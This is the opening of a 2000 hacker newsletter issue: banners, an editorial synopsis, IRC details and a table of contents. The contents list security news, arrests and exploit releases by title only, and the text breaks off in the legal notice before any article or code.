Copy Link
Add to Bookmark
Report
hwa-hn53
[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA 2000=] Number 53 Volume 2 Issue 5 1999 April-May 2000
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
= "ABUSUS NON TOLLIT USUM" =
==========================================================================
jesi li cuo vjesti ?
Editor: Cruciphux (cruciphux@dok.org)
A Hackers Without Attitudes Production. (c) 1999, 2000
http://welcome.to/HWA.hax0r.news/
http://hwa-security.net/
Site is live, grand opening coming soon!
*** NEW WEB BOARD NOW ACTIVE ***
http://discserver.snap.com/Indices/103991.html
==========================================================================
= =
= ____ =
= / ___|_____ _____ _ __ __ _ __ _ ___ =
= | | / _ \ \ / / _ \ '__/ _` |/ _` |/ _ \ =
= | |__| (_) \ V / __/ | | (_| | (_| | __/ =
= \____\___/ \_/ \___|_| \__,_|\__, |\___| =
= |___/ =
= =
= =
This is #53 covering April 10th to May 7th, 2000
= See words from Editor on note about this issue and #54 =
= =
= ** 636 People are on the email notify list as of this writing. =
= =
= =
= see note below in the Help Out! section re:distribution. =
= =
= =
= =
==========================================================================
_ _ _ ___ _ _
| | | | ___| |_ __ / _ \ _ _| |_| |
| |_| |/ _ \ | '_ \| | | | | | | __| |
| _ | __/ | |_) | |_| | |_| | |_|_|
|_| |_|\___|_| .__/ \___/ \__,_|\__(_)
|_|
If you'd like to help there are many things you can do, for full details
mail me and i'll send you a file of suggestions and jobs that need to be
handled. You can choose what you want to do, in your email you may want
to mention if you are interested or have experience in areas such as:
* cgi programming
* php programming
* file archive maintainance
* message forum moderator
* news article collector <- We can never have enough of these!
* mailing list monitoring
* watch for and report interesting updates on selected web sites
Plus others.
@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
# #
@ The HWA website is sponsored by CUBESOFT communications I highly @
# recommend you consider these people for your web hosting needs, #
@ @
# Web site sponsored by CUBESOFT networks http://www.csoft.net #
@ check them out for great fast web hosting! @
# #
# http://www.csoft.net/~hwa @
@ #
@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
____ _
/ ___| _ _ _ __ ___ _ __ ___(_)___
\___ \| | | | '_ \ / _ \| '_ \/ __| / __|
___) | |_| | | | | (_) | |_) \__ \ \__ \
|____/ \__, |_| |_|\___/| .__/|___/_|___/
|___/ |_|
SYNOPSIS (READ THIS)
--------------------
The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).
This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.
It *is* intended however, to compliment such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle... <g>
@HWA
=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ...
=-----------------------------------------------------------------------=
"If live is a waste of time and time is a waste of life, then lets all get
wasted and have the time of our lives"
- kf
____| _| |
__| | __ \ _ \ __|
| __| | | __/ |
_____|_| _| _|\___|\__|
Catch us on Internet Relay Chat, Eris Free Net... /join #HWA.hax0r.news
**************************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' when keyed ***
*** ***
*** please join to discuss or impart news on the zine and around the ***
*** scene or just to hang out, we get some interesting visitors you ***
*** could be one of em. ***
*** ***
*** Note that the channel isn't there to entertain you its purpose is ***
*** to bring together people interested and involved in the underground***
*** to chat about current and recent events etc, do drop in to talk or ***
*** hangout. Also if you want to promo your site or send in news tips ***
*** its the place to be, just remember we're not #hack or #chatzone... ***
**************************************************************************
=--------------------------------------------------------------------------=
_____ _ _
/ ____| | | | |
| | ___ _ __ | |_ ___ _ __ | |_ ___
| | / _ \| '_ \| __/ _ \ '_ \| __/ __|
| |___| (_) | | | | || __/ | | | |_\__ \
\_____\___/|_| |_|\__\___|_| |_|\__|___/
=--------------------------------------------------------------------------=
[ INDEX ] HWA.hax0r.news #53 Apr/May 2000
=--------------------------------------------------------------------------=
Key Intros
=--------------------------------------------------------------------------=
00.0 .. LEGAL & COPYRIGHTS ..............................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. THIS IS WHO WE ARE ..............................................
ABUSUS NON TOLLIT USUM?
This is (in case you hadn't guessed) Latin, and loosely translated
it means "Just because something is abused, it should not be taken
away from those who use it properly). This is our new motto.
=--------------------------------------------------------------------------=
Source Keys HWA.hax0r.news 2000
=--------------------------------------------------------------------------=
"The three most dangerous things in the world are a programmer with a
soldering iron, a hardware type with a program patch and a user with
an idea." - Unknown
[MM] - Articles from Mass Media sources (Wired MSNBC Reuters etc)
[IND] - Independant articles or unsolicited material.
[HWA] - Articles or interviews by HWA Staff members
[HNN] - Sourced from the Hacker News Network http://www.hackernews.com/
[HNS] - Sourced from Help Net Security http://net-security.org/
[403] - Sourced from 403-security http://www.403-security.net/
[ISN] - Articles from the ISN Mailing list (usually sourced from media)
[b0f] - Buffer Overflow Security release http://b0f.freebsd.lublin.pl/
[zsh] - ZSH release http://zsh.interniq.org/
[COR] - Correction to previous release.
=--------------------------------------------------------------------------=
Key Content HWA.hax0r.news 2000
=--------------------------------------------------------------------------=
<someguy> only a poor workman blames his tools, unless of course those tools
were written by Microsoft :)
<some1> lol
01.0 .. GREETS ...........................................................
01.1 .. Last minute stuff, rumours, newsbytes ............................
01.2 .. Mailbag ..........................................................
02.0 .. From the Editor...................................................
03.0 .. [IND]Hacking your way into a girlie's heart, etc by: ch1ckie.....
04.0 .. [HWA]Apr 12th:MPAA Site DoS'd off the net..............................
05.0 .. [b0f]Common WWW and CGI vulnerabilities list ......................
06.0 .. [IND]Project Gamma interviews SpaceRogue of HNN........................
07.0 .. [MM] MS Engineers plant secret anti-Netscape password .................
08.0 .. [b0f]Omni HTTPD Pro v2.06 for Win9x and NT DoS.....................
09.0 .. [MM]Judge bans Mitnick from taking part in tech conference ...........
10.0 .. [MM]The continuing saga of MAFIABOY king lemur of DDoS................
10.1 .. [MM]Mafiaboy reaction: "yeah right"...................................
10.2 .. [MM]Mafiaboy's dad gets busted for conspiracy ........................
10.3 .. [MM]On another mafiaboy note, a new site has popped up on Geocities...
10.4 .. [MM]Mafiaboy:Probe of Hacker Nets a Second Suspect: His Father .......
10.5 .. [MM]Mafiaboy:The Challenge of Fighting Cybercrime (Reno)..............
10.6 .. [MM]Mafiaboy:Janet Reno licks chops over Mafiaboy arrest..............
10.7 .. [MM]Mafiaboy:IS MAFIABOY REAL OR A CREATION OF THE MEDIA? ............
10.8 .. [MM]Mafiaboy:Canadian Feds charge Mafiaboy in DDoS attacks............
10.9 .. [MM]Mafiaboy:Canadian Teen Charged in Web Blitz.......................
11.0 .. [MM]Mafiaboy:Canada Arrests 'Mafiaboy' Hacker, Aged 15 ...............
11.1 .. [MM]Mafiaboy:Canadian Arrest Made in February Web Attacks ............
11.2 .. [MM]Mafiaboy:Reno Says 'Mafiaboy' Hacker Must Face Punishment ........
11.3 .. [MM]Mafiaboy:FBI Has Evidence That He and Others Launched Web Attacks.
11.4 .. [MM]Mafiaboy:Hacker cripples Area 51 site for 36 hours................
12.0 .. [ISN]Mafiaboy:Dispelling some myths, did he really hack? etc..........
13.0 .. [MM]Cybercrime Solution Has Bugs .....................................
14.0 ,, [IND]The new spank.c DoS tool source and an analysis paper by 1st.....
15.0 .. [IND] RFParalyse.c:Cause undesired effects remotely against Win9x.....
16.0 .. [MM] New worm: ILOVEYOU spreads via e-mail attachments................
17.0 .. [HWA] May 4th 2000: SugarKing interviews ph33r the b33r...............
18.0 .. [SEC] Security Bulletins Digest May 02nd 2000.........................
19.0 .. [b0f] Latest releases from Buffer Overflow Security...................
20.0 .. [HWA] Informal chat/interview with Mixter ............................
21.0 .. [b0f] b0f3-ncurses.txt FBSD 3.4 libncurses buffer overflow by venglin.
22.0 .. [b0f] b0f2-NetOp.txt NetOp, Bypass of NT Security to retrieve files ..
23.0 .. [b0f] b0f1-Mailtraq.txt Mailtraq remote file retriving ...............
24.0 .. [b0f] Exploit/DoS /makes Timbuktu Pro 2.0b650 stop responding ........
25.0 .. [b0f] ides.c:'Intrusion Detection Evasion System'.....................
26.0 .. [b0f] lscan2.c Lamerz Scan, a small fork()ing scanner.................
27.0 .. [b0f] Pseudo Cryptographic Filesystem.................................
28.0 .. [b0f] mtr-0.41 (freebsd) local root exploit...........................
29.0 .. [b0f] shellcode that connets to a host&port and starts a shell........
30.0 .. [b0f] NT Security check paper part 2 by Slash.........................
31.0 .. [IND] The apache.org hack. by {} and Hardbeat (Apr 4th 2000)..........
32.0 .. [IND] The Goat Files: mindphasr talks more about his bust.............
33.0 .. [IND] The Goat Files: "Hackers unite - a goat security expose"........
34.0 .. [MM] Napster boots 317,377 users......................................
35.0 .. [MM] ytcracker busted for web defacement..............................
36.0 .. [HNN] Junger wins in Appeals Court-Code Declared Speech ..............
37.0 .. [HNN] Bullet to Scan Hard Drives of Web Site Visitors ................
38.0 .. [HNN] Links to Web Sites Illegal......................................
39.0 .. [HNN] British Companies Complacent ...................................
40.0 .. [HNN] Trio Becomes First Internet Crime Conviction for Hong Kong .....
41.0 .. [HNN] Census Afraid of Electronic Intrusion ..........................
42.0 .. [HNN] Hardware Key Logger Introduced .................................
43.0 .. [HNN] Napalm Issue 4 .................................................
44.0 .. [HNN] EU Set To Rewrite Human Rights .................................
45.0 .. [HNN] Dutch Want Their Own Echelon ...................................
46.0 .. [HNN] SPAM Goes Wireless .............................................
47.0 .. [HNN] Forget Fort Knox Now It's Fort Net .............................
48.0 .. [HNN] TrustedBSD Announced ...........................................
49.0 .. [HNN] 690,000 Illegal Web Pages on the Net ...........................
50.0 .. [HNN] Attacking the Attackers ........................................
51.0 .. [HNN] More EZines Released ...........................................
51.1 .. [IND] HYPE - w00w00 zine..............................................
52.0 .. [HNN] Max Vision Goes to Court .......................................
53.0 .. [HNN] Mitnick On the Corporate Conference Circuit ....................
54.0 .. [HNN] AOL Liable for Music Piracy ....................................
55.0 .. [HNN] Canadian ISP Reveals Credit Card Numbers .......................
56.0 .. [HNN] Vatis Concerned About Spoofing .................................
57.0 .. [HNN] L0pht Releases CRYPTOCard Vulnerabilities ......................
58.0 .. [HNN] Phone Company's Announce Security Initiative ...................
59.0 .. [HNN] Microsoft Admits to Backdoor in Server Software ................
60.0 .. [HNN] Backdoor Found in E-Commerce Software ..........................
61.0 .. [HNN] MostHateD Pleads Guilty ........................................
62.0 .. [HNN] NSA And CIA Deny Echelon is Used Domestically ..................
63.0 .. [HNN] Keyboard Monitoring Becoming More Popular with Business ........
64.0 .. [HNN] Japanese Cult Wrote Software for Navy ..........................
65.0 .. [HNN] MPAA Suspects Denial of Service Attack .........................
66.0 .. [HNN] Even More E-zines ..............................................
67.0 .. [HNN] BackDoor Now Called a Bug ......................................
68.0 .. [HNN] North Carolina Plagued by 'hackers' ............................
69.0 .. [HNN] Web Sites Redirected, Serbians Blamed ..........................
70.0 .. [HNN] Metallica Sues Napster, Gets Web Site Defaced ..................
71.0 .. [HNN] Japan To Control PS Exports, Fears Weapon Use ..................
72.0 .. [HNN] Spy Laptop Goes Missing ........................................
73.0 .. [HNN] Napster Users May Get Jail .....................................
74.0 .. [HNN] Brazil Tax Records on the Loose ................................
75.0 .. [HNN] SingNet Suffers Abuse From Overseas ............................
76.0 .. [HNN] Attrition Graphs ...............................................
77.0 .. [HNN] Wide Open Source ...............................................
78.0 .. [HNN] Mafiaboy Charged for DDoS Attacks ..............................
79.0 .. [HNN] TerraServer Downtime Blamed on Malicious Activity ..............
80.0 .. [HNN] Ranum To Receives Clue Award ...................................
81.0 .. [HNN] Ireland Eases Restrictions on Encryption Export Procedures .....
82.0 .. [HNN] Web Defacement Supports Separatists ............................
83.0 .. [HNN] Exploits Protected by Copyright ................................
84.0 .. [HNN] The Erosion of Privacy on the Net ..............................
85.0 .. [HNN] MafiaBoy Released on Bail ......................................
86.0 .. [HNN] Mitnick Banned from Speaking ...................................
87.0 .. [HNN] Top Politicos Meet to Discuss Infrastructure Security ..........
88.0 .. [HNN] NSF To Issue Grants for Security Schooling .....................
89.0 .. [HNN] CalPoly Charges Student with Port Scanning .....................
90.0 .. [HNN] Encrypted Sheet Music Available on Net Soon ....................
91.0 .. [HNN] ISPs Still Vulnerable to SNMP Holes ............................
92.0 .. [HNN] Internet Security Act of 2000 ..................................
93.0 .. [HNN] PSINet Hit with DoS Attack .....................................
94.0 .. [HNN] Satellite Jammer Plans on Net ..................................
95.0 .. [HNN] GNIT Vulnerability Scanner Released ............................
96.0 .. [HNN] Free MafiaBoy ..................................................
97.0 .. [HNN] MafiaBoy News Roundup ..........................................
98.0 .. [HNN] Members of HV2k Raided .........................................
99.0 .. [HNN] Piracy Legal In Italy, Sort of .................................
100.0 .. [HNN] Palm VII Considered Security Threat ............................
101.0 .. [HNN] Navy Intranet National Security Risk? ..........................
102.0 .. [HNN] Mitnick Upset Over Claims Made by UITA .........................
103.0 .. [HNN] Holiday Message from Disney Leaked .............................
104.0 .. [HNN] Attrition Updates Mailing List .................................
105.0 .. [HNN] MafiaBoy's Friends Under Investigation .........................
106.0 .. [HNN] Backdoor Found in Redhat .......................................
107.0 .. [HNN] USC Stands Their Ground ........................................
108.0 .. [HNN] Critics Chide COPPA - Disney Plan Criticized ...................
109.0 .. [HNN] Happy CIH Virus Day ............................................
110.0 .. [HNN] AboveNet Hit with DDoS .........................................
111.0 .. [HNN] Thailand Has No Software Industry Due To Piracy ................
112.0 .. [HNN] War Plans Found on Net .........................................
113.0 .. [HNN] India May get New Cyber Laws ...................................
114.0 .. [HNN] Napster Backs 'Bizkit ..........................................
115.0 .. [HNN] Dr. Dre Sues Students for Napster Use ..........................
116.0 .. [HNN] Chernobyl Hits South Korea .....................................
117.0 .. [HNN] Russian Gas Supplier Invaded by Cyber Criminals ................
118.0 .. [HNN] G8 Plans Cyber Security Conference .............................
119.0 .. [HNN] Cyber Crime Institute Established ..............................
120.0 .. [HNN] Domain Lock Down Launched ......................................
121.0 .. [HNN] Backdoor Found in Shopping Cart Software .......................
122.0 .. [HNN] FBI Investigating AboveNet DoS .................................
123.0 .. [HNN] Intel Removes ID Feature From New Chips ........................
124.0 .. [HNN] Another HotMail Hole Patched ...................................
125.0 .. [HNN] Iron Feather Collection at Risk ................................
126.0 .. [HNN] Rubicon This Weekend, H2K Announcement .........................
127.0 .. [HNN] Laptop Issues Justice in Brazil ................................
128.0 .. [HNN] CCPA and ECPA not Applicable ...................................
129.0 .. [HNN] McAfee Redefines Trojan ........................................
130.0 .. [HNN] Mitnick Back in Court ..........................................
131.0 .. [HNN] MI5 To Build Email Eavesdropping Center ........................
132.0 .. [HNN] French ISP Wannado Vulnerable ..................................
133.0 .. [HNN] Russia Arrests 55 in Credit Card Scheme ........................
134.0 .. [HNN] BTopenworld Suffers Information Leakage ........................
135.0 .. [HNN] Nmap 2.5 Released ..............................................
136.0 .. [HNN] Washington State Announces CLEW Agreement ......................
137.0 .. [HNN] New York Times Links to DeCSS ..................................
138.0 .. [HNN] More E-zines ...................................................
139.0 .. [HNN] mStream Joins Trinoo, TFN and Stacheldraht .....................
140.0 .. [HNN] Phrack 56 Released .............................................
141.0 .. [HNN] Tech Crimes Get Double Sentences ...............................
142.0 .. [HNN] Numbers Numbers Who has the Numbers ............................
143.0 .. [HNN] Password Thief in Hong Kong Behind Bars ........................
144.0 .. [HNN] FMA and SM Release CD ..........................................
145.0 .. [HNN] Metallica Claims It has 300,000 Individual Names of Napster Users
146.0 .. [HNN] President Sets GPS to Full Force ...............................
147.0 .. [HNN] New Cyber Crime Treaty Making the Rounds .......................
148.0 .. [HNN] Vulnerabilities Found in FileMaker .............................
149.0 .. [HNN] Internet Threat gets Four Months ...............................
150.0 .. [HNN] Dissemination of Pager Traffic Not Needed For Violation of Law .
151.0 .. [HNN] 2600 Secures Big Time Lawyer ...................................
152.0 .. [HNN] Virus Says 'I Love You' ........................................
153.0 .. [HNN] Quake III Flaw Leaves Users Vulnerable .........................
154.0 .. [HNN] Phone Taps on the Rise .........................................
155.0 .. [HNN] Minors Loose Rights In Georgia .................................
156.0 .. [HNN] 'I Love You' ...................................................
157.0 .. [HNN] Microsoft Employee Busted for Piracy ...........................
158.0 .. [HNN] Cisco Insider Convicted of Stealing PIX Source .................
159.0 .. [HNN] British Plan to Monitor Net ....................................
160.0 .. [HNN] MPAA Tries to Ban 2600 Lawyer ..................................
161.0 .. [HNN] Apache.org Defaced .............................................
162.0 .. [HNN] Voice Security on the Cheap ....................................
163.0 .. [HNN] Takedown Reviewed ..............................................
164.0 .. [HNS] Apr 8:NEW KIND OF SECURITY SCANNER..............................
165.0 .. [HNS] April 8:WAYS TO ATTACK..........................................
166.0 .. [HNS] April 7:STOLEN ACCOUNTS.........................................
167.0 .. [HNS] April 7:JAILED FOR SIX MONTHS...................................
168.0 .. [HNS] April 7: PcANYWHERE WEAK PASSWORD ENCRYPTION....................
169.0 .. [HNS] April 7: NET PRIVACY TOOLS......................................
170.0 .. [HNS] April 7:SECURITY ADDITIONS......................................
171.0 .. [HNS] April 7:COOKIES.................................................
172.0 .. [HNS] April 7:SECURE E-MAIL SERVICE...................................
173.0 .. [HNS] April 7:ONLINE MUGGERS..........................................
174.0 .. [HNS] April 6:SURVEY BY DTI...........................................
175.0 .. [HNS] April 6: COMPUTER CODES PROTECTED...............................
176.0 .. [HNS] April 6: RELEASED AFTER CODE MACHINE THEFT......................
177.0 .. [HNS] April 6:CYBERPATROL BLOCK LIST..................................
178.0 .. [HNS] April 5:CRYPTO REGULATIONS......................................
179.0 .. [HNS] April 5:GFI AND NORMAN TEAM UP..................................
180.0 .. [HNS] April 5:MASTERCARD OFFER VIRUS REPAIR SERVICE...................
181.0 .. [HNS] April 5: BUFFER OVERFLOWS.......................................
182.0 .. [HNS] April 5: PIRACY.................................................
183.0 .. [HNS] April 5:BIGGEST PUBLIC-KEY CRYPTO CRACK EVER....................
184.0 .. [HNS]: April 5:GROUP APPEALS DVD CRYPTO INJUNCTION....................
185.0 .. [HNS] April 5: VIRUS BLOWS A HOLE IN NATO'S SECURITY..................
186.0 .. [HNS] April 4: FIGHT SPAM WITH SPAM...................................
187.0 .. [HNS] April 4:REALPLAYER BUFFER OVERFLOW..............................
188.0 .. [HNS] May 31st:NO PROBLEMS?...........................................
189.0 .. [HNS] May 31:MS SECURITY BULLETIN #38.................................
190.0 .. [HNS] May 31: BURGLAR ALARM CATCHES ATTACKERS ON THE NET..............
191.0 .. [HNS] May 31: SENATE EYES GUARD FOR INFO SECURITY.....................
192.0 .. [HNS] May 31: TURBOLINUX SECURITY ANNOUNCEMENT........................
193.0 .. [HNS] May 31:NAI ON VBS FIREBURN WORM................................
194.0 .. [HNS] May 31:INTERNET GUARD DOG PRO...................................
195.0 .. [HNS] May 31: FRANK VAN VLIET INTERVIEW...............................
196.0 .. [HNS] May 31: MISSING FILES...........................................
197.0 .. [HNS] May 31: THE MYTH OF OPEN SOURCE SECURITY........................
198.0 .. [HNS] May 31:INFORMATION SHARING MECHANISM............................
199.0 .. [HNS] May 31:WAP RELATED DEFACEMENT...................................
200.0 .. [HNS] May 31:RUNNING A BSD-BASED FIREWALL.............................
201.0 .. [HNS] May 24:LAPTOPS STOLEN FROM PARLIAMENT...........................
202.0 .. [HNS] May 24: MICROSOFT PROGRAMS VULNERABLE TO VIRUSES................
203.0 .. [HNS] May 24:INTRUSION DETECTION ON LINUX.............................
204.0 .. [HNS] May 24:CRACKED! PART 3: HUNTING THE HUNTER......................
205.0 .. [HNS] May 24: THE NEXT GENERATION OF ILOVEYOU:THE PORN WORM...........
206.0 .. [HNS] May 23:PAPERS SENT TO PROSECUTOROS..............................
207.0 .. [HNS] May 23:INFOEXPRESS AND NETWORK UTIL. AGREEMENT..................
208.0 .. [HNS] May 23:FREE EXPORT OF ENCRYPTION SOFTWARE.......................
209.0 .. [HNS] May 23:NAI GAUNTLET FIREWALL VULNERABILITY......................
210.0 .. [HNS] May 22: CISCO SECURE PIX FIREWALL PROBLEMS......................
211.0 .. [HNS] May 22:INDIA AND CYBER CRIME....................................
212.0 .. [IND] CERT® Advisory CA-2000-05 NS Improper SSL validation............
213.0 .. [MM] IBM will only hire immitation hackers............................
214.0 .. [IND] BUGTRAQ: "Vulnerability statistics database"....................
215.0 .. [MM] Big Brother has your file........................................
216.0 .. [MM] Napster gets tough with Metallica................................
217.0 .. [IND] The Slashdot DDoS attack: What happened?........................
218.0 .. [IND] China Executes Bank Manager for Computer Crime..................
219.0 .. [IND] Data Transmission Pioneer Passes Away...........................
220.0 .. [IND] Canada Agrees to Drop Big Brother Files........................
221.0 .. [IND] Senate Bill Will Make Minor Computer Hacking a Felony...........
222.0 .. [IND] McAfee considers Netbus pro legitimate tool.....................
223.0 .. [HWA] The Hoax "When hackers get bored..."............................
224.0 .. [IND] XFree86 3.3.6 buffer overflow to root compromise................
225.0 .. [MM] Power your PC with a potato!.....................................
226.0 .. [MM] Mobile phones fertile for E-bugs.................................
227.0 .. [MM] The virtual threat...............................................
228.0 .. [b0f] Qpopper exploit code............................................
229.0 .. [b0f] Wingate advisory................................................
230.0 .. [b0f] ILOVEYOU Virus analysis and removal.............................
231.0 .. [IND] Intrusion detection on Linux....................................
232.0 .. [IND] scan.txt Spitzner gets an unusual scan..........................
233.0 .. [IND] local ssh 1.2.27 dos attack.....................................
234.0 .. [IND] ascend router remote exploit by loneguard.......................
235.0 .. [IND] ascend router remote dos exploit by rfp.........................
236.0 .. [IND] citrix router local exploit by dug song.........................
237.0 .. [IND] ascend router remote dos attack by msg.net......................
238.0 .. [IND] cisco/ascend router remote exploit. posted by mixter............
239.0 .. [IND] remote ssh 1.2.27 remote overflow by Core SDI SA................
240.0 .. [IND] '0-day' jolt2.c poc code........................................
241.0 .. [IND] cisco remote dos attack.........................................
242.0 .. [IND] linux local misc overflow by jim paris..........................
243.0 .. [IND] linux remote misc overflow by noir..............................
244.0 .. [IND] linux remote misc overflow by jim paris.........................
245.0 .. [IND] ascend remote dos attack........................................
246.0 .. [IND] ftp-ozone.c cisco remote bug by dug song........................
247.0 .. [IND] reset_state.c cisco remote dos attack by vortexia...............
248.0 .. [IND] ftpexp.c (Version 6.2/Linux-0.10) ftpd overflow by digit........
249.0 .. [IND] killsentry.c linux/misc remote port sentry killer by vortexia...
250.0 .. [IND] xsol-x.c mandrake 7.0 local overflow by lwc.....................
251.0 .. [IND] klogind.c bsdi 4.0.1 remote overflow by duke....................
252.0 .. [IND] pmcrash.c router/livingston remote dos attack...................
253.0 .. [IND] cisco-connect.c cisco dos attack by tiz.telesup.................
254.0 .. [IND] ascend.c ascend remote dos attack by the posse..................
255.0 .. [IND] ciscocrack.c / ciscocrack.pl cisco password cracker.............
256.0 .. [IND] l0phtl0phe-kid.c remote linux misc overflow by scut/teso........
257.0 .. [IND] RFPickaxe.pl winnt remote exploit...............................
258.0 .. [IND] cproxy.c winnt remote dos attack by |[TDP]|.....................
259.0 .. [IND] fdmnt-smash2.c slackware 7.0 local exploit by Scrippie..........
260.0 .. [IND] nis-spoof.c remote rpc exploit..................................
261.0 .. [IND] bugzilla.pl remote cgi exploit by karin........................
262.0 .. [IND] netsol.c remote cgi exploit by bansh33.........................
263.0 .. [IND] napstir.c remote linux misc exploit by S.......................
264.0 .. [IND] SSG-arp.c aix 4.1 local overflow by cripto.....................
265.0 .. [IND] warftpd.c win95 remote dos attack by eth0......................
266.0 .. [IND] sniffit.c remote linux misc overflow by fusys..................
267.0 .. [IND] pam_console.c redhat (6.2/6.1/6.0) local exploit...............
268.0 .. [IND] routedsex.c slackware 7 remote dos attack by xt................
269.0 .. [IND] omni-httpd.sh win98 remote dos attack by sirius................
270.0 .. [IND] RFParalyze.c win(95/98) remote dos attack by rfp...............
271.0 .. [IND] www.c novel (4.11/4.1) remote dos attack by venglin...........
272.0 .. [IND] elm-smash.c slackware 4.0 local overflow by Scrippie...........
273.0 .. [IND] ADMDNews.zip win(nt/2k) remote overflow by ADM.................
274.0 .. [IND] netprex.c Solaris (2.6/7) local overflow by cheez whiz.(fixed).
275.0 .. [IND] gnomelib.sh suse (6.4/6.3) local overflow by bladi & almudena..
276.0 .. [IND] piranha remote redhat 6.2 exploit..............................
277.0 .. [IND] xdnewsweb.pl remote cgi exploit by djhd........................
278.0 .. [IND] nslookup.c local linux misc overflow by lore...................
279.0 .. [IND] syslogd.c local linux misc dos attack by lore. ................
280.0 .. [IND] 3man.c local redhat 6.1 overflow by kil3r of lam3rz............
281.0 .. [IND] (linux)Mail[8.1] local buffer overflow, by v9..................
282.0 .. [ISN] How to hack a bank.............................................
283.0 .. [ISN] Spain hackers sabotage museum site.............................
284.0 .. [ISN] Hackers: Cyber saviours or snake-oil salesmen?.................
285.0 .. [ISN] U.S to beef up Cyber Defenses..................................
286.0 .. [ISN] Javascript-in-cookies Netscape hole + MS hole..................
287.0 .. [ISN] Intel plans to giveaway security software via web..............
288.0 .. [ISN] Companies boosting security for web sites......................
289.0 .. [ISN] Price Waterhouse Coopers tackles web security..................
290.0 .. [ISN] Hackers, cybercops, continue cat-and-mouse game................
291.0 .. [ISN] Navy intranet a security threat?...............................
292.0 .. [ISN] Hackers break into Romanian senate's web site..................
293.0 .. [ISN] FBI investigating new web attack...............................
294.0 .. [ISN] Backdoor exposes credit cards..................................
295.0 .. [ISN] Qualcomm warns of Eudora security hole.........................
296.0 .. [ISN] Infamous computer hacker under fire............................
297.0 .. [ISN] Palm VII banned from lab as security threat....................
298.0 .. [ISN] What firewalls will look like in 2003..........................
299.0 .. [ISN] Mitnick reacts to speaking ban.................................
300.0 .. [ISN] RealNetworks patches video server vulnerability................
301.0 .. [ISN] Group behaviour and security...................................
302.0 .. [ISN] Record encryption puzzle cracked...............................
303.0 .. [ISN] Expert warns of powerful new hacker tool.......................
304.0 .. [IND] mstream source and analysis....................................
305.0 .. [ISN] CRYPTO-GRAM Newsletter April 15th 2000.........................
306.0 .. [ISN] Suspected hackers arrested in Russian credit card fraud........
307.0 .. [ISN] Microsoft zaps Hotmail password bug............................
308.0 .. [ISN] Cybercrime solution has bugs...................................
309.0 .. [ISN] Government plans computer lock-down............................
310.0 .. [HWA] phonic dumps on hack.co.za and gov-boi .......................
311.0 .. [IND] IP Sniffing and Spoofing.......................................
=-------------------------------------------------------------------------=
AD.S .. Post your site ads or etc here, if you can offer something in
return thats tres cool, if not we'll consider ur ad anyways so
send it in.ads for other zines are ok too btw just mention us
in yours, please remember to include links and an email contact.
Ha.Ha .. Humour and puzzles ............................................
Oi! laddie! send in humour for this section! I need a laugh
and its hard to find good stuff... ;)...........................
SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
* COMMON TROJAN PORTS LISTING.....................................
A.1 .. PHACVW linx and references......................................
A.2 .. Hot Hits (.gov and .mil + other interesting traffic on our site)
A.3 ,, Mirror Sites list...............................................
A.4 .. The Hacker's Ethic 90's Style..................................
A.5 .. Sources........................................................
A.6 .. Resources......................................................
A.7 .. Submission information.........................................
A.8 .. Mailing lists information......................................
A.9 .. Whats in a name? why HWA.hax0r.news??..........................
A,10 .. HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again).
A.11 .. Underground and (security?) Zines..............................
* Feb 2000 moved opening data to appendices, A.2 through A.10, probably
more to be added. Quicker to get to the news, and info etc... - Ed
=--------------------------------------------------------------------------=
@HWA'99, 2000
00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
_ _
| | ___ __ _ __ _| |
| | / _ \/ _` |/ _` | |
| |__| __/ (_| | (_| | |
|_____\___|\__, |\__,_|_|
|___/
THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF
THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE
RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND
IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS
(SEE FAQ).
Important semi-legalese and license to redistribute:
YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE
GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS
Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S
ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is
http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE
